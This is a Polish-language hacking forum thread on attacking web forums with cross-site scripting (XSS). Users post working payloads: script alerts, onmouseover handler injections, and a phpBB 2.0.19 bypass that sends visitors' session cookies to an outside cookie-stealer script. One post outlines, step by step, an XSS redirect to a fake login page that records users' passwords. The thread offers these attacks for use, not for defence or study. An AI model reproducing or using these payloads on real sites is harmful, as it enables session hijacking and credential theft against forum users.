XSS na forum

[PHmaster]

http://cc-team.org/index.php?name=bugtraq&show=1012
Przeczytałem dokładnie i nie rozumiem jak można osiągnąć jakiś efekt. Czy mógłby ktoś napisać dokładnie (krok po kroku) przykład, jak wyświetlić alert na danym forum??? Nie rozumiem akurat tego kodu...

 

[hxv]

http://stalowatwierdza.ovh.org/xss.html

Myślę, ze dobrze wszystko wyjaśniłem ;]

Oczywiście można tez podać parametr src=http://adres do znacznika script, tylko trzeba pamiętać o braku cudzysłowów

 

[adikx]

<script>alert('Jakiś haker stosuje xss')</script>

Jeśli forum nie udostępnia html to ****(cztery litery) a jeśli udostępnia np znacznik


to walnij coś takiego:

<p onmouseover=alert('Jakiś haker stosuje xss')>Jakiś tekst</p>

i po najecaniu na daną linię tekstu wyświetli się twój komunikat

A tu troche trudniejsze:

1. skopiować kod strony logowania portalu w którym wykorzystasz atak xss
2. przerobienie go na taki który by zapisywał dane do pliku i potem wracał do poprzedniej strony
3. Wklejenie kodu przekierowania

Co zrobi taki xss??
Powiecmy że zrobiłeś xss na jakimś portalu
Jakiś zalogowany użytkownik wejdzie na zaatakowaną stronke
Natychmiast przeniesie go na twoją stronke niby logowania gdy wpisze login i hasło to zapisze je w pliku i znowu wróci do księgi gości

 

[hxv]

Z tego co wiem, to:

<p onmouseover=alert('Jakiś haker stosuje xss')>Jakiś tekst</p>

już nie działa w phpBB.

A drugiego sposobu nie jestem w stanie zrozumieć :/ Możesz jakoś to wytłumaczyć?

 

[eddy3291]

<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie' b='<pre' >

Działa na phpbb 2.0.19 (być może też niższych wersjach)

 

[dysia.aniolek]

Tu macie ladnie opisane jak to zrobic LINK

 

[PHmaster]

Originally posted by adikx
Kod:

<p onmouseover=alert('Jakiś haker stosuje xss')>Jakiś tekst</p>


i po najecaniu na daną linię tekstu wyświetli się twój komunikat

trochę odświeżam...
nie zapomniałeś o " " przy alercie ??. To chyba nie zadziała bez tego, a teraz większość stron ma ochronę nie tylko przed znacznikami script, ale i przed cudzysłowami...

 

[amex]

Originally posted by PHmaster
nie zapomniałeś o " " przy alercie ??

jeśli chodzi Ci o to ze powinno być tak:

<p onmouseover="alert('Jakiś haker stosuje xss')">Jakiś tekst</p>

to nie, nie musi xD

 

[PHmaster]

hm, a mi na IE działa tylko ze znakiem " " :whoeva:

 

[31337]

1. Wchodzisz tu (otwórz w nowym oknie)
2. W jednym z ostatnich 3 pól wpisujesz ">
3. Ogladasz jak sie rozjechała strona.

Widze że wczesniej dodali na bugtraq niż tu załatali

k:

k:
A zgłaszane było 2 miesiące temu.